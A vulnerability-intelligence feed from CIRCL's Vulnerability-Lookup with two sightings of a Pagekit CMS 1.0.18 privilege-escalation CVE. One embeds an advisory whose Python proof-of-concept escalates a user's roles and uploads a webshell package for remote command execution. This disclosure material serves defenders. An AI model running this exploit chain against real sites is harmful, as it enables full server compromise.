Most recent sightings.

https://vulnerability.circl.lu/sightings/feed Most recent sightings. 2026-06-27T22:45:51.006592+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/c6180f0a-7d6d-4502-be1f-9008a576e728/export c6180f0a-7d6d-4502-be1f-9008a576e728 2026-06-27T22:45:51.032560+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "c6180f0a-7d6d-4502-be1f-9008a576e728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-57518", "type": "seen", "source": "https://gist.github.com/sermikr0/6f0a67e9d101746fcdb04827de137847", "content": "\n# CVE-2026-57518 \u2014 Pagekit CMS 1.0.18 Privilege Escalation \u2192 RCE\n\n**CVE:** CVE-2026-57518 \n**Product:** Pagekit CMS 1.0.18 (https://github.com/pagekit/pagekit) \n**CVSS 3.1:** 8.8 HIGH \u2014 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` \n**CWE:** CWE-269 Improper Privilege Management \n**Reporter:** Saidakbarxon Maqsudxonov / saidakbarxonmaqsudxonov4@gmail.com \n**Date:** 2026-06-26 \n\n---\n\n## Summary\n\n`UserApiController::saveAction()` only checks for assignment of `Role::ROLE_ADMINISTRATOR` (hard-coded ID=3). Custom roles with elevated permissions (e.g., `system: manage packages`) can be freely assigned by any user holding `user: manage users` permission, enabling privilege escalation to Remote Code Execution via the package installer.\n\n---\n\n## Root Cause\n\n**File:** `app/system/modules/user/src/Controller/UserApiController.php` lines 178\u2013188\n\n```php\n$key = array_search(Role::ROLE_ADMINISTRATOR, @$data['roles'] ?: []);\n$add = false !== $key && !$user->isAdministrator();\n$remove = false === $key && $user->isAdministrator();\n\nif (($self && $remove) || !App::user()->isAdministrator() && ($remove || $add)) {\n App::abort(403, 'Cannot add/remove Admin Role.');\n}\n\n$user->save($data); // saves ALL roles including unchecked custom ones\n```\n\n`Role::ROLE_ADMINISTRATOR = 3` (hard-coded in `Role.php`).\n\nAny role with ID \u2260 3 (custom roles: ID 4, 5, 6\u2026) passes through without restriction.\n\n## Attack Chain\n\n1. Attacker has account with `user: manage users` permission\n2. Send `POST /api/user/{attacker_id}` with `\"roles\": [2, 5]` \u2014 role 5 is a custom role with `system: manage packages`\n3. Attacker now holds `system: manage packages`\n4. `POST /admin/api/package/upload` \u2014 upload malicious ZIP containing PHP webshell\n5. `POST /admin/api/package/install` \u2014 install package\n6. Access `http://target/packages/malicious/index.php?cmd=id` \u2192 RCE\n\n## Proof of Concept\n\n```python\nimport requests, re, zipfile, io\n\nBASE = \"https://target.com\"\nsess = requests.Session()\n\n# 1. Login as low-priv user with \"user: manage users\"\nr = sess.post(f\"{BASE}/api/user/login\",\n json={\"username\": \"editor\", \"password\": \"password\"})\ncsrf = re.search(r'\"csrf\"\\s*:\\s*\"([^\"]+)\"', r.text).group(1)\n\n# 2. Escalate to role ID=5 (has \"system: manage packages\")\nmy_id = sess.get(f\"{BASE}/api/users/me\").json()[\"id\"]\nsess.post(f\"{BASE}/api/user/{my_id}\",\n json={\"user\": {\"id\": my_id, \"roles\": [2, 5]}},\n headers={\"X-CSRF-Token\": csrf})\n\n# 3. Upload malicious ZIP \u2192 RCE\nbuf = io.BytesIO()\nwith zipfile.ZipFile(buf, \"w\") as z:\n z.writestr(\"shell/index.php\", '')\n z.writestr(\"shell/composer.json\", '{\"name\":\"shell\",\"version\":\"1.0.0\"}')\nbuf.seek(0)\nsess.post(f\"{BASE}/admin/api/package/upload?type=extension\",\n files={\"file\": (\"shell.zip\", buf, \"application/zip\")},\n headers={\"X-CSRF-Token\": csrf})\n\nprint(f\"RCE: {BASE}/packages/shell/index.php?cmd=id\")\n```\n\n## Impact\n\nFull server compromise on any Pagekit installation that delegates `user: manage users` to non-owner accounts.\n\n## Mitigation\n\nProject is unmaintained (last commit 2018, archived 2023). Restrict `user: manage users` to fully-trusted administrators only, or migrate to a maintained CMS.", "creation_timestamp": "2026-06-26T15:47:53.100198Z"} 2026-06-26T15:47:53.100198+00:00 https://vulnerability.circl.lu/sighting/2df44e3e-8cbc-40ad-b26f-b05305101080/export 2df44e3e-8cbc-40ad-b26f-b05305101080 2026-06-27T22:45:51.028801+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "2df44e3e-8cbc-40ad-b26f-b05305101080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-57518", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mp7qcdhtpc2c", "content": "CVE-2026-57518 - Pagekit CMS 1.0.18 Privilege Escalation via UserApiController\nCVE ID : CVE-2026-57518\n \n Published : June 26, 2026, 3:58 p.m. | 3\u00a0hours, 13\u00a0minutes ago\n \n Description : Pagekit CMS 1.0.18 contains a privilege escalation vulnerability that allows authenticated ...", "creation_timestamp": "2026-06-26T20:00:48.653426Z"} 2026-06-26T20:00:48.653426+00:00